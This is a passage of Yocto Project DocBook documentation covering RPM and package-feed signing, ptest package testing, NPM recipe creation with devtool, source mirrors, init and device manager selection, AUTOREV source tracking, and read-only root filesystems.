- <title>Signing RPM Packages</title>
-
- <para>
- To enable signing RPM packages, you must set up the
- following configurations in either your
- <filename>local.config</filename> or
- <filename>distro.config</filename> file:
- <literallayout class='monospaced'>
- # Inherit sign_rpm.bbclass to enable signing functionality
- INHERIT += " sign_rpm"
- # Define the GPG key that will be used for signing.
- RPM_GPG_NAME = "<replaceable>key_name</replaceable>"
- # Provide passphrase for the key
- RPM_GPG_PASSPHRASE = "<replaceable>passphrase</replaceable>"
- </literallayout>
- <note>
- Be sure to supply appropriate values for both
- <replaceable>key_name</replaceable> and
- <replaceable>passphrase</replaceable>
- </note>
- Aside from the
- <filename>RPM_GPG_NAME</filename> and
- <filename>RPM_GPG_PASSPHRASE</filename> variables in the
- previous example, two optional variables related to signing
- exist:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>GPG_BIN</filename>:</emphasis>
- Specifies a <filename>gpg</filename> binary/wrapper
- that is executed when the package is signed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>GPG_PATH</filename>:</emphasis>
- Specifies the <filename>gpg</filename> home
- directory used when the package is signed.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='processing-package-feeds'>
- <title>Processing Package Feeds</title>
-
- <para>
- In addition to being able to sign RPM packages, you can
- also enable signed package feeds for IPK and RPM packages.
- </para>
-
- <para>
- The steps you need to take to enable signed package feed
- use are similar to the steps used to sign RPM packages.
- You must define the following in your
- <filename>local.config</filename> or
- <filename>distro.config</filename> file:
- <literallayout class='monospaced'>
- INHERIT += "sign_package_feed"
- PACKAGE_FEED_GPG_NAME = "<replaceable>key_name</replaceable>"
- PACKAGE_FEED_GPG_PASSPHRASE_FILE = "<replaceable>path_to_file_containing_passphrase</replaceable>"
- </literallayout>
- For signed package feeds, the passphrase must exist in a
- separate file, which is pointed to by the
- <filename>PACKAGE_FEED_GPG_PASSPHRASE_FILE</filename>
- variable.
- Regarding security, keeping a plain text passphrase out of
- the configuration is more secure.
- </para>
-
- <para>
- Aside from the
- <filename>PACKAGE_FEED_GPG_NAME</filename> and
- <filename>PACKAGE_FEED_GPG_PASSPHRASE_FILE</filename>
- variables, three optional variables related to signed
- package feeds exist:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>GPG_BIN</filename>:</emphasis>
- Specifies a <filename>gpg</filename> binary/wrapper
- that is executed when the package is signed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>GPG_PATH</filename>:</emphasis>
- Specifies the <filename>gpg</filename> home
- directory used when the package is signed.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>PACKAGE_FEED_GPG_SIGNATURE_TYPE</filename>:</emphasis>
- Specifies the type of <filename>gpg</filename>
- signature.
- This variable applies only to RPM and IPK package
- feeds.
- Allowable values for the
- <filename>PACKAGE_FEED_GPG_SIGNATURE_TYPE</filename>
- are "ASC", which is the default and specifies ascii
- armored, and "BIN", which specifies binary.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='testing-packages-with-ptest'>
- <title>Testing Packages With ptest</title>
-
- <para>
- A Package Test (ptest) runs tests against packages built
- by the OpenEmbedded build system on the target machine.
- A ptest contains at least two items: the actual test, and
- a shell script (<filename>run-ptest</filename>) that starts
- the test.
- The shell script that starts the test must not contain
- the actual test - the script only starts the test.
- On the other hand, the test can be anything from a simple
- shell script that runs a binary and checks the output to
- an elaborate system of test binaries and data files.
- </para>
-
- <para>
- The test generates output in the format used by
- Automake:
- <literallayout class='monospaced'>
- <replaceable>result</replaceable>: <replaceable>testname</replaceable>
- </literallayout>
- where the result can be <filename>PASS</filename>,
- <filename>FAIL</filename>, or <filename>SKIP</filename>,
- and the testname can be any identifying string.
- </para>
-
- <para>
- For a list of Yocto Project recipes that are already
- enabled with ptest, see the
- <ulink url='https://wiki.yoctoproject.org/wiki/Ptest'>Ptest</ulink>
- wiki page.
- <note>
- A recipe is "ptest-enabled" if it inherits the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-ptest'><filename>ptest</filename></ulink>
- class.
- </note>
- </para>
-
- <section id='adding-ptest-to-your-build'>
- <title>Adding ptest to Your Build</title>
-
- <para>
- To add package testing to your build, add the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
- variables to your <filename>local.conf</filename> file,
- which is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " ptest"
- EXTRA_IMAGE_FEATURES += "ptest-pkgs"
- </literallayout>
- Once your build is complete, the ptest files are installed
- into the
- <filename>/usr/lib/<replaceable>package</replaceable>/ptest</filename>
- directory within the image, where
- <filename><replaceable>package</replaceable></filename>
- is the name of the package.
- </para>
- </section>
-
- <section id='running-ptest'>
- <title>Running ptest</title>
-
- <para>
- The <filename>ptest-runner</filename> package installs a
- shell script that loops through all installed ptest test
- suites and runs them in sequence.
- Consequently, you might want to add this package to
- your image.
- </para>
- </section>
-
- <section id='getting-your-package-ready'>
- <title>Getting Your Package Ready</title>
-
- <para>
- In order to enable a recipe to run installed ptests
- on target hardware,
- you need to prepare the recipes that build the packages
- you want to test.
- Here is what you have to do for each recipe:
- <itemizedlist>
- <listitem><para><emphasis>Be sure the recipe
- inherits the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-ptest'><filename>ptest</filename></ulink>
- class:</emphasis>
- Include the following line in each recipe:
- <literallayout class='monospaced'>
- inherit ptest
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Create <filename>run-ptest</filename>:</emphasis>
- This script starts your test.
- Locate the script where you will refer to it
- using
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>.
- Here is an example that starts a test for
- <filename>dbus</filename>:
- <literallayout class='monospaced'>
- #!/bin/sh
- cd test
- make -k runtest-TESTS
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Ensure dependencies are
- met:</emphasis>
- If the test adds build or runtime dependencies
- that normally do not exist for the package
- (such as requiring "make" to run the test suite),
- use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-RDEPENDS'><filename>RDEPENDS</filename></ulink>
- variables in your recipe in order for the package
- to meet the dependencies.
- Here is an example where the package has a runtime
- dependency on "make":
- <literallayout class='monospaced'>
- RDEPENDS_${PN}-ptest += "make"
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Add a function to build the
- test suite:</emphasis>
- Not many packages support cross-compilation of
- their test suites.
- Consequently, you usually need to add a
- cross-compilation function to the package.
- </para>
-
- <para>Many packages based on Automake compile and
- run the test suite by using a single command
- such as <filename>make check</filename>.
- However, the host <filename>make check</filename>
- builds and runs on the same computer, while
- cross-compiling requires that the package is built
- on the host but executed for the target
- architecture (though often, as in the case for
- ptest, the execution occurs on the host).
- The built version of Automake that ships with the
- Yocto Project includes a patch that separates
- building and execution.
- Consequently, packages that use the unaltered,
- patched version of <filename>make check</filename>
- automatically cross-compiles.</para>
- <para>Regardless, you still must add a
- <filename>do_compile_ptest</filename> function to
- build the test suite.
- Add a function similar to the following to your
- recipe:
- <literallayout class='monospaced'>
- do_compile_ptest() {
- oe_runmake buildtest-TESTS
- }
- </literallayout>
- </para></listitem>
- <listitem><para><emphasis>Ensure special configurations
- are set:</emphasis>
- If the package requires special configurations
- prior to compiling the test code, you must
- insert a <filename>do_configure_ptest</filename>
- function into the recipe.
- </para></listitem>
- <listitem><para><emphasis>Install the test
- suite:</emphasis>
- The <filename>ptest</filename> class
- automatically copies the file
- <filename>run-ptest</filename> to the target and
- then runs make <filename>install-ptest</filename>
- to run the tests.
- If this is not enough, you need to create a
- <filename>do_install_ptest</filename> function and
- make sure it gets called after the
- "make install-ptest" completes.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
- </section>
-
- <section id='creating-node-package-manager-npm-packages'>
- <title>Creating Node Package Manager (NPM) Packages</title>
-
- <para>
- <ulink url='https://en.wikipedia.org/wiki/Npm_(software)'>NPM</ulink>
- is a package manager for the JavaScript programming
- language.
- The Yocto Project supports the NPM
- <ulink url='&YOCTO_DOCS_BB_URL;#bb-fetchers'>fetcher</ulink>.
- You can use this fetcher in combination with
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename></ulink>
- to create recipes that produce NPM packages.
- </para>
-
- <para>
- Two workflows exist that allow you to create NPM packages
- using <filename>devtool</filename>: the NPM registry modules
- method and the NPM project code method.
- <note>
- While it is possible to create NPM recipes manually,
- using <filename>devtool</filename> is far simpler.
- </note>
- Additionally, some requirements and caveats exist.
- </para>
-
- <section id='npm-package-creation-requirements'>
- <title>Requirements and Caveats</title>
-
- <para>
- You need to be aware of the following before using
- <filename>devtool</filename> to create NPM packages:
- <itemizedlist>
- <listitem><para>
- Of the two methods that you can use
- <filename>devtool</filename> to create NPM
- packages, the registry approach is slightly
- simpler.
- However, you might consider the project
- approach because you do not have to publish
- your module in the NPM registry
- (<ulink url='https://docs.npmjs.com/misc/registry'><filename>npm-registry</filename></ulink>),
- which is NPM's public registry.
- </para></listitem>
- <listitem><para>
- Be familiar with
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-devtool-reference'><filename>devtool</filename></ulink>.
- </para></listitem>
- <listitem><para>
- The NPM host tools need the native
- <filename>nodejs-npm</filename> package, which
- is part of the OpenEmbedded environment.
- You need to get the package by cloning the
- <ulink url='https://github.com/openembedded/meta-openembedded'></ulink>
- repository out of GitHub.
- Be sure to add the path to your local copy to
- your <filename>bblayers.conf</filename> file.
- </para></listitem>
- <listitem><para>
- <filename>devtool</filename> cannot detect
- native libraries in module dependencies.
- Consequently, you must manually add packages
- to your recipe.
- </para></listitem>
- <listitem><para>
- While deploying NPM packages,
- <filename>devtool</filename> cannot determine
- which dependent packages are missing on the
- target (e.g. the node runtime
- <filename>nodejs</filename>).
- Consequently, you need to find out what
- files are missing and be sure they are on the
- target.
- </para></listitem>
- <listitem><para>
- Although you might not need NPM to run your
- node package, it is useful to have NPM on your
- target.
- The NPM package name is
- <filename>nodejs-npm</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='npm-using-the-registry-modules-method'>
- <title>Using the Registry Modules Method</title>
-
- <para>
- This section presents an example that uses the
- <filename>cute-files</filename> module, which is a
- file browser web application.
- <note>
- You must know the <filename>cute-files</filename>
- module version.
- </note>
- </para>
-
- <para>
- The first thing you need to do is use
- <filename>devtool</filename> and the NPM fetcher to
- create the recipe:
- <literallayout class='monospaced'>
- $ devtool add "npm://registry.npmjs.org;package=cute-files;version=1.0.2"
- </literallayout>
- The <filename>devtool add</filename> command runs
- <filename>recipetool create</filename> and uses the
- same fetch URI to download each dependency and capture
- license details where possible.
- The result is a generated recipe.
- </para>
-
- <para>
- The recipe file is fairly simple and contains every
- license that <filename>recipetool</filename> finds
- and includes the licenses in the recipe's
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LIC_FILES_CHKSUM'><filename>LIC_FILES_CHKSUM</filename></ulink>
- variables.
- You need to examine the variables and look for those
- with "unknown" in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
- field.
- You need to track down the license information for
- "unknown" modules and manually add the information to the
- recipe.
- </para>
-
- <para>
- <filename>recipetool</filename> creates a "shrinkwrap" file
- for your recipe.
- Shrinkwrap files capture the version of all dependent
- modules.
- Many packages do not provide shrinkwrap files.
- <filename>recipetool</filename> create a shrinkwrap
- file as it runs.
- <note>
- A package is created for each sub-module.
- This policy is the only practical way to have the
- licenses for all of the dependencies represented
- in the license manifest of the image.
- </note>
- </para>
-
- <para>
- The <filename>devtool edit-recipe</filename> command
- lets you take a look at the recipe:
- <literallayout class='monospaced'>
- $ devtool edit-recipe cute-files
- SUMMARY = "Turn any folder on your computer into a cute file browser, available on the local network."
- LICENSE = "MIT &amp; ISC &amp; Unknown"
- LIC_FILES_CHKSUM = "file://LICENSE;md5=71d98c0a1db42956787b1909c74a86ca \
- file://node_modules/toidentifier/LICENSE;md5=1a261071a044d02eb6f2bb47f51a3502 \
- file://node_modules/debug/LICENSE;md5=ddd815a475e7338b0be7a14d8ee35a99 \
- ...
-
- SRC_URI = " \
- npm://registry.npmjs.org/;package=cute-files;version=${PV} \
- npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
- "
-
- S = "${WORKDIR}/npm"
-
- inherit npm
-
- LICENSE_${PN} = "MIT"
- LICENSE_${PN}-accepts = "MIT"
- LICENSE_${PN}-array-flatten = "MIT"
- ...
- LICENSE_${PN}-vary = "MIT"
- </literallayout>
- Three key points exist in the previous example:
- <itemizedlist>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- uses the NPM scheme so that the NPM fetcher
- is used.
- </para></listitem>
- <listitem><para>
- <filename>recipetool</filename> collects all
- the license information.
- If a sub-module's license is unavailable,
- the sub-module's name appears in the comments.
- </para></listitem>
- <listitem><para>
- The <filename>inherit npm</filename> statement
- causes the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-npm'><filename>npm</filename></ulink>
- class to package up all the modules.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can run the following command to build the
- <filename>cute-files</filename> package:
- <literallayout class='monospaced'>
- $ devtool build cute-files
- </literallayout>
- Remember that <filename>nodejs</filename> must be
- installed on the target before your package.
- </para>
-
- <para>
- Assuming 192.168.7.2 for the target's IP address, use
- the following command to deploy your package:
- <literallayout class='monospaced'>
- $ devtool deploy-target -s cute-files root@192.168.7.2
- </literallayout>
- Once the package is installed on the target, you can
- test the application:
- <note>
- Because of a know issue, you cannot simply run
- <filename>cute-files</filename> as you would if you
- had run <filename>npm install</filename>.
- </note>
- <literallayout class='monospaced'>
- $ cd /usr/lib/node_modules/cute-files
- $ node cute-files.js
- </literallayout>
- On a browser, go to
- <filename>http://192.168.7.2:3000</filename> and you
- see the following:
- <imagedata fileref="figures/cute-files-npm-example.png" align="center" width="6in" depth="4in" />
- </para>
-
- <para>
- You can find the recipe in
- <filename>workspace/recipes/cute-files</filename>.
- You can use the recipe in any layer you choose.
- </para>
- </section>
-
- <section id='npm-using-the-npm-projects-method'>
- <title>Using the NPM Projects Code Method</title>
-
- <para>
- Although it is useful to package modules already in the
- NPM registry, adding <filename>node.js</filename> projects
- under development is a more common developer use case.
- </para>
-
- <para>
- This section covers the NPM projects code method, which is
- very similar to the "registry" approach described in the
- previous section.
- In the NPM projects method, you provide
- <filename>devtool</filename> with an URL that points to the
- source files.
- </para>
-
- <para>
- Replicating the same example, (i.e.
- <filename>cute-files</filename>) use the following command:
- <literallayout class='monospaced'>
- $ devtool add https://github.com/martinaglv/cute-files.git
- </literallayout>
- The recipe this command generates is very similar to the
- recipe created in the previous section.
- However, the <filename>SRC_URI</filename> looks like the
- following:
- <literallayout class='monospaced'>
- SRC_URI = " \
- git://github.com/martinaglv/cute-files.git;protocol=https \
- npmsw://${THISDIR}/${BPN}/npm-shrinkwrap.json \
- "
- </literallayout>
- In this example, the main module is taken from the Git
- repository and dependents are taken from the NPM registry.
- Other than those differences, the recipe is basically the
- same between the two methods.
- You can build and deploy the package exactly as described
- in the previous section that uses the registry modules
- method.
- </para>
- </section>
- </section>
- </section>
-
- <section id='efficiently-fetching-source-files-during-a-build'>
- <title>Efficiently Fetching Source Files During a Build</title>
-
- <para>
- The OpenEmbedded build system works with source files located
- through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRC_URI'><filename>SRC_URI</filename></ulink>
- variable.
- When you build something using BitBake, a big part of the operation
- is locating and downloading all the source tarballs.
- For images, downloading all the source for various packages can
- take a significant amount of time.
- </para>
-
- <para>
- This section shows you how you can use mirrors to speed up
- fetching source files and how you can pre-fetch files all of which
- leads to more efficient use of resources and time.
- </para>
-
- <section id='setting-up-effective-mirrors'>
- <title>Setting up Effective Mirrors</title>
-
- <para>
- A good deal that goes into a Yocto Project
- build is simply downloading all of the source tarballs.
- Maybe you have been working with another build system
- (OpenEmbedded or Angstrom) for which you have built up a
- sizable directory of source tarballs.
- Or, perhaps someone else has such a directory for which you
- have read access.
- If so, you can save time by adding statements to your
- configuration file so that the build process checks local
- directories first for existing tarballs before checking the
- Internet.
- </para>
-
- <para>
- Here is an efficient way to set it up in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- SOURCE_MIRROR_URL ?= "file:///home/you/your-download-dir/"
- INHERIT += "own-mirrors"
- BB_GENERATE_MIRROR_TARBALLS = "1"
- # BB_NO_NETWORK = "1"
- </literallayout>
- </para>
-
- <para>
- In the previous example, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BB_GENERATE_MIRROR_TARBALLS'><filename>BB_GENERATE_MIRROR_TARBALLS</filename></ulink>
- variable causes the OpenEmbedded build system to generate
- tarballs of the Git repositories and store them in the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- directory.
- Due to performance reasons, generating and storing these
- tarballs is not the build system's default behavior.
- </para>
-
- <para>
- You can also use the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREMIRRORS'><filename>PREMIRRORS</filename></ulink>
- variable.
- For an example, see the variable's glossary entry in the
- Yocto Project Reference Manual.
- </para>
- </section>
-
- <section id='getting-source-files-and-suppressing-the-build'>
- <title>Getting Source Files and Suppressing the Build</title>
-
- <para>
- Another technique you can use to ready yourself for a
- successive string of build operations, is to pre-fetch
- all the source files without actually starting a build.
- This technique lets you work through any download issues
- and ultimately gathers all the source files into your
- download directory
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-build-downloads'><filename>build/downloads</filename></ulink>,
- which is located with
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>.
- </para>
-
- <para>
- Use the following BitBake command form to fetch all the
- necessary sources without starting the build:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>target</replaceable> --runall=fetch
- </literallayout>
- This variation of the BitBake command guarantees that you
- have all the sources for that BitBake target should you
- disconnect from the Internet and want to do the build
- later offline.
- </para>
- </section>
- </section>
-
- <section id="selecting-an-initialization-manager">
- <title>Selecting an Initialization Manager</title>
-
- <para>
- By default, the Yocto Project uses SysVinit as the initialization
- manager.
- However, support also exists for systemd,
- which is a full replacement for init with
- parallel starting of services, reduced shell overhead and other
- features that are used by many distributions.
- </para>
-
- <para>
- Within the system, SysVinit treats system components as services.
- These services are maintained as shell scripts stored in the
- <filename>/etc/init.d/</filename> directory.
- Services organize into different run levels.
- This organization is maintained by putting links to the services
- in the <filename>/etc/rcN.d/</filename> directories, where
- <replaceable>N/</replaceable> is one of the following options:
- "S", "0", "1", "2", "3", "4", "5", or "6".
- <note>
- Each runlevel has a dependency on the previous runlevel.
- This dependency allows the services to work properly.
- </note>
- </para>
-
- <para>
- In comparison, systemd treats components as units.
- Using units is a broader concept as compared to using a service.
- A unit includes several different types of entities.
- Service is one of the types of entities.
- The runlevel concept in SysVinit corresponds to the concept of a
- target in systemd, where target is also a type of supported unit.
- </para>
-
- <para>
- In a SysVinit-based system, services load sequentially (i.e. one
- by one) during and parallelization is not supported.
- With systemd, services start in parallel.
- Needless to say, the method can have an impact on system startup
- performance.
- </para>
-
- <para>
- If you want to use SysVinit, you do
- not have to do anything.
- But, if you want to use systemd, you must
- take some steps as described in the following sections.
- </para>
-
- <section id='using-systemd-exclusively'>
- <title>Using systemd Exclusively</title>
-
- <para>
- Set these variables in your distribution configuration
- file as follows:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " systemd"
- VIRTUAL-RUNTIME_init_manager = "systemd"
- </literallayout>
- You can also prevent the SysVinit
- distribution feature from
- being automatically enabled as follows:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_BACKFILL_CONSIDERED = "sysvinit"
- </literallayout>
- Doing so removes any redundant SysVinit scripts.
- </para>
-
- <para>
- To remove initscripts from your image altogether,
- set this variable also:
- <literallayout class='monospaced'>
- VIRTUAL-RUNTIME_initscripts = ""
- </literallayout>
- </para>
-
- <para>
- For information on the backfill variable, see
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES_BACKFILL_CONSIDERED'><filename>DISTRO_FEATURES_BACKFILL_CONSIDERED</filename></ulink>.
- </para>
- </section>
-
- <section id='using-systemd-for-the-main-image-and-using-sysvinit-for-the-rescue-image'>
- <title>Using systemd for the Main Image and Using SysVinit for the Rescue Image</title>
-
- <para>
- Set these variables in your distribution configuration
- file as follows:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " systemd"
- VIRTUAL-RUNTIME_init_manager = "systemd"
- </literallayout>
- Doing so causes your main image to use the
- <filename>packagegroup-core-boot.bb</filename> recipe and
- systemd.
- The rescue/minimal image cannot use this package group.
- However, it can install SysVinit
- and the appropriate packages will have support for both
- systemd and SysVinit.
- </para>
- </section>
- </section>
-
- <section id="selecting-dev-manager">
- <title>Selecting a Device Manager</title>
-
- <para>
- The Yocto Project provides multiple ways to manage the device
- manager (<filename>/dev</filename>):
- <itemizedlist>
- <listitem><para><emphasis>Persistent and Pre-Populated<filename>/dev</filename>:</emphasis>
- For this case, the <filename>/dev</filename> directory
- is persistent and the required device nodes are created
- during the build.
- </para></listitem>
- <listitem><para><emphasis>Use <filename>devtmpfs</filename> with a Device Manager:</emphasis>
- For this case, the <filename>/dev</filename> directory
- is provided by the kernel as an in-memory file system and
- is automatically populated by the kernel at runtime.
- Additional configuration of device nodes is done in user
- space by a device manager like
- <filename>udev</filename> or
- <filename>busybox-mdev</filename>.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id="static-dev-management">
- <title>Using Persistent and Pre-Populated<filename>/dev</filename></title>
-
- <para>
- To use the static method for device population, you need to
- set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-USE_DEVFS'><filename>USE_DEVFS</filename></ulink>
- variable to "0" as follows:
- <literallayout class='monospaced'>
- USE_DEVFS = "0"
- </literallayout>
- </para>
-
- <para>
- The content of the resulting <filename>/dev</filename>
- directory is defined in a Device Table file.
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_DEVICE_TABLES'><filename>IMAGE_DEVICE_TABLES</filename></ulink>
- variable defines the Device Table to use and should be set
- in the machine or distro configuration file.
- Alternatively, you can set this variable in your
- <filename>local.conf</filename> configuration file.
- </para>
-
- <para>
- If you do not define the
- <filename>IMAGE_DEVICE_TABLES</filename> variable, the default
- <filename>device_table-minimal.txt</filename> is used:
- <literallayout class='monospaced'>
- IMAGE_DEVICE_TABLES = "device_table-mymachine.txt"
- </literallayout>
- </para>
-
- <para>
- The population is handled by the <filename>makedevs</filename>
- utility during image creation:
- </para>
- </section>
-
- <section id="devtmpfs-dev-management">
- <title>Using <filename>devtmpfs</filename> and a Device Manager</title>
-
- <para>
- To use the dynamic method for device population, you need to
- use (or be sure to set) the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-USE_DEVFS'><filename>USE_DEVFS</filename></ulink>
- variable to "1", which is the default:
- <literallayout class='monospaced'>
- USE_DEVFS = "1"
- </literallayout>
- With this setting, the resulting <filename>/dev</filename>
- directory is populated by the kernel using
- <filename>devtmpfs</filename>.
- Make sure the corresponding kernel configuration variable
- <filename>CONFIG_DEVTMPFS</filename> is set when building
- you build a Linux kernel.
- </para>
-
- <para>
- All devices created by <filename>devtmpfs</filename> will be
- owned by <filename>root</filename> and have permissions
- <filename>0600</filename>.
- </para>
-
- <para>
- To have more control over the device nodes, you can use a
- device manager like <filename>udev</filename> or
- <filename>busybox-mdev</filename>.
- You choose the device manager by defining the
- <filename>VIRTUAL-RUNTIME_dev_manager</filename> variable
- in your machine or distro configuration file.
- Alternatively, you can set this variable in your
- <filename>local.conf</filename> configuration file:
- <literallayout class='monospaced'>
- VIRTUAL-RUNTIME_dev_manager = "udev"
-
- # Some alternative values
- # VIRTUAL-RUNTIME_dev_manager = "busybox-mdev"
- # VIRTUAL-RUNTIME_dev_manager = "systemd"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id="platdev-appdev-srcrev">
- <title>Using an External SCM</title>
-
- <para>
- If you're working on a recipe that pulls from an external Source
- Code Manager (SCM), it is possible to have the OpenEmbedded build
- system notice new recipe changes added to the SCM and then build
- the resulting packages that depend on the new recipes by using
- the latest versions.
- This only works for SCMs from which it is possible to get a
- sensible revision number for changes.
- Currently, you can do this with Apache Subversion (SVN), Git, and
- Bazaar (BZR) repositories.
- </para>
-
- <para>
- To enable this behavior, the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- of the recipe needs to reference
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>.
- Here is an example:
- <literallayout class='monospaced'>
- PV = "1.2.3+git${SRCPV}"
- </literallayout>
- Then, you can add the following to your
- <filename>local.conf</filename>:
- <literallayout class='monospaced'>
- SRCREV_pn-<replaceable>PN</replaceable> = "${AUTOREV}"
- </literallayout>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PN'><filename>PN</filename></ulink>
- is the name of the recipe for which you want to enable automatic source
- revision updating.
- </para>
-
- <para>
- If you do not want to update your local configuration file, you can
- add the following directly to the recipe to finish enabling
- the feature:
- <literallayout class='monospaced'>
- SRCREV = "${AUTOREV}"
- </literallayout>
- </para>
-
- <para>
- The Yocto Project provides a distribution named
- <filename>poky-bleeding</filename>, whose configuration
- file contains the line:
- <literallayout class='monospaced'>
- require conf/distro/include/poky-floating-revisions.inc
- </literallayout>
- This line pulls in the listed include file that contains
- numerous lines of exactly that form:
- <literallayout class='monospaced'>
- #SRCREV_pn-opkg-native ?= "${AUTOREV}"
- #SRCREV_pn-opkg-sdk ?= "${AUTOREV}"
- #SRCREV_pn-opkg ?= "${AUTOREV}"
- #SRCREV_pn-opkg-utils-native ?= "${AUTOREV}"
- #SRCREV_pn-opkg-utils ?= "${AUTOREV}"
- SRCREV_pn-gconf-dbus ?= "${AUTOREV}"
- SRCREV_pn-matchbox-common ?= "${AUTOREV}"
- SRCREV_pn-matchbox-config-gtk ?= "${AUTOREV}"
- SRCREV_pn-matchbox-desktop ?= "${AUTOREV}"
- SRCREV_pn-matchbox-keyboard ?= "${AUTOREV}"
- SRCREV_pn-matchbox-panel-2 ?= "${AUTOREV}"
- SRCREV_pn-matchbox-themes-extra ?= "${AUTOREV}"
- SRCREV_pn-matchbox-terminal ?= "${AUTOREV}"
- SRCREV_pn-matchbox-wm ?= "${AUTOREV}"
- SRCREV_pn-settings-daemon ?= "${AUTOREV}"
- SRCREV_pn-screenshot ?= "${AUTOREV}"
- .
- .
- .
- </literallayout>
- These lines allow you to experiment with building a
- distribution that tracks the latest development source
- for numerous packages.
- <note><title>Caution</title>
- The <filename>poky-bleeding</filename> distribution
- is not tested on a regular basis.
- Keep this in mind if you use it.
- </note>
- </para>
- </section>
-
- <section id='creating-a-read-only-root-filesystem'>
- <title>Creating a Read-Only Root Filesystem</title>
-
- <para>
- Suppose, for security reasons, you need to disable
- your target device's root filesystem's write permissions
- (i.e. you need a read-only root filesystem).
- Or, perhaps you are running the device's operating system
- from a read-only storage device.
- For either case, you can customize your image for
- that behavior.
- </para>
-
- <note>
- Supporting a read-only root filesystem requires that the system and
- applications do not try to write to the root filesystem.
- You must configure all parts of the target system to write
- elsewhere, or to gracefully fail in the event of attempting to
- write to the root filesystem.
- </note>
-
- <section id='creating-the-root-filesystem'>
- <title>Creating the Root Filesystem</title>
-
- <para>
- To create the read-only root filesystem, simply add the
- "read-only-rootfs" feature to your image, normally in one of two ways.
- The first way is to add the "read-only-rootfs" image feature
- in the image's recipe file via the
- <filename>IMAGE_FEATURES</filename> variable:
- <literallayout class='monospaced'>
- IMAGE_FEATURES += "read-only-rootfs"
- </literallayout>
- As an alternative, you can add the same feature from within your
- build directory's <filename>local.conf</filename> file with the
- associated <filename>EXTRA_IMAGE_FEATURES</filename> variable, as in:
- <literallayout class='monospaced'>
- EXTRA_IMAGE_FEATURES = "read-only-rootfs"
- </literallayout>
- </para>
-
- <para>
- For more information on how to use these variables, see the
- "<link linkend='usingpoky-extend-customimage-imagefeatures'>Customizing Images Using Custom <filename>IMAGE_FEATURES</filename> and <filename>EXTRA_IMAGE_FEATURES</filename></link>"
- section.
- For information on the variables, see
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
- and <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>.
- </para>
- </section>
-
- <section id='post-installation-scripts'>
- <title>Post-Installation Scripts</title>
-
- <para>
- It is very important that you make sure all
- post-Installation (<filename>pkg_postinst</filename>) scripts
- for packages that are installed into the image can be run
- at the time when the root filesystem is created during the
- build on the host system.
- These scripts cannot attempt to run during first-boot on the
- target device.
- With the "read-only-rootfs" feature enabled,
- the build system checks during root filesystem creation to make
- sure all post-installation scripts succeed.
- If any of these scripts still need to be run after the root
- filesystem is created, the build immediately fails.
- These build-time checks ensure that the build fails
- rather than the target device fails later during its
- initial boot operation.
- </para>
-
- <para>
- Most of the common post-installation scripts generated by the
- build system for the out-of-the-box Yocto Project are engineered
- so that they can run during root filesystem creation
- (e.g. post-installation scripts for caching fonts).
- However, if you create and add custom scripts, you need
- to be sure they can be run during this file system creation.
- </para>
